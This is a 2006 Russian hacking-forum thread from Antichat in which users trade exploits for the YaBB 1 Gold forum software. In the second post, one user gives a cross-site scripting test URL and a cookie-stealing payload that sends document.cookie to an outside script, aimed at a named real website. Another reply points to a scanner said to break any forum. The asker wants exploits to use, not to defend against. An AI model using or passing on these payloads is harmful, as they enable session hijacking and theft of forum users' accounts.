ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу Уязвимости форума YaBB 1 Gold - Release и сплойты к нему
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимости форума YaBB 1 Gold - Release и сплойты к нему
  #1  
Старый 03.01.2006, 21:20
Аватар для asma2k
asma2k
Новичок
Регистрация: 18.03.2005
Сообщений: 4
Провел на форуме:
94314

Репутация: 0
Exclamation Уязвимости форума YaBB 1 Gold - Release и сплойты к нему
Народ,хотелось бы узнать какие последние уязвимости этого форума есть и сплойты к нему?

А то по phpBB куча всякой инфы,а по YaBB 1 Gold я нашел мало,да и то какое то старье.

Может,кто что новое подскажет?
 
Ответить с цитированием

  #2  
Старый 05.01.2006, 07:26
Аватар для Romaxa55
Romaxa55
Участник форума
Регистрация: 19.10.2005
Сообщений: 128
Провел на форуме:
584821

Репутация: 83
Отправить сообщение для Romaxa55 с помощью ICQ
По умолчанию
Да, там можно межсайтовый скриптинг произвести, вот пример:
Код:
http://host/cgi-bin/YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert()</script>
Код:
http://www.area51experience.com.ar/foro/YaBB.pl?board=gral;action=display; 
num=10360245269<Script>location%3d'Http://url/x.php?Cookie%3d' 
%2b(document.cookie)%3b</Script>
P.S. прошу прощения за флуд.
 
Ответить с цитированием

  #3  
Старый 05.01.2006, 19:11
Аватар для WizART
WizART
Участник форума
Регистрация: 19.07.2005
Сообщений: 292
Провел на форуме:
208487

Репутация: 11
По умолчанию
Цитата:
Код:
http://www.area51experience.com.ar/foro/YaBB.pl?board=gral;action=display; 
num=10360245269<Script>location%3d'Http://url/x.php?Cookie%3d' 
%2b(document.cookie)%3b</Script>
Эт ты где такую урлу надыбал?)
 
Ответить с цитированием

  #4  
Старый 05.01.2006, 19:18
Аватар для D1mOn
D1mOn
Постоянный
Регистрация: 02.10.2005
Сообщений: 490
Провел на форуме:
2333839

Репутация: 212
По умолчанию
это всё пасивные)))жаль
 
Ответить с цитированием

  #5  
Старый 05.01.2006, 21:53
Аватар для Romaxa55
Romaxa55
Участник форума
Регистрация: 19.10.2005
Сообщений: 128
Провел на форуме:
584821

Репутация: 83
Отправить сообщение для Romaxa55 с помощью ICQ
По умолчанию
Цитата:
Сообщение от WizART  
Эт ты где такую урлу надыбал?)
на секьюре лежала, там и надыбал, ведь он же не сообщил какой сайт именно, попросили уязвимости,Ю я и сообщил.
 
Ответить с цитированием

  #6  
Старый 06.01.2006, 02:00
Аватар для Ricky
Ricky
Banned
Регистрация: 04.01.2006
Сообщений: 10
Провел на форуме:
24702

Репутация: 2
По умолчанию
Цитата:
Сообщение от asma2k  
Народ,хотелось бы узнать какие последние уязвимости этого форума есть и сплойты к нему?

А то по phpBB куча всякой инфы,а по YaBB 1 Gold я нашел мало,да и то какое то старье.

Может,кто что новое подскажет?
http://forum.antichat.ru/thread11807.html

Возьми от сюда мануальный сканер, и проскань этот форум. Ни один форум еще от этого сканера не был защищен.
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
А нафига публиковать инфу о том как ломать чаты. Егорыч+++ Чаты 52 14.11.2005 20:23
Уязвимости чатов L@nd@R Чаты 4 03.04.2005 05:12
Вопрос про уязвимости в YaBB 1 Gold - SP1 netgenom Форумы 1 04.11.2004 14:13



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ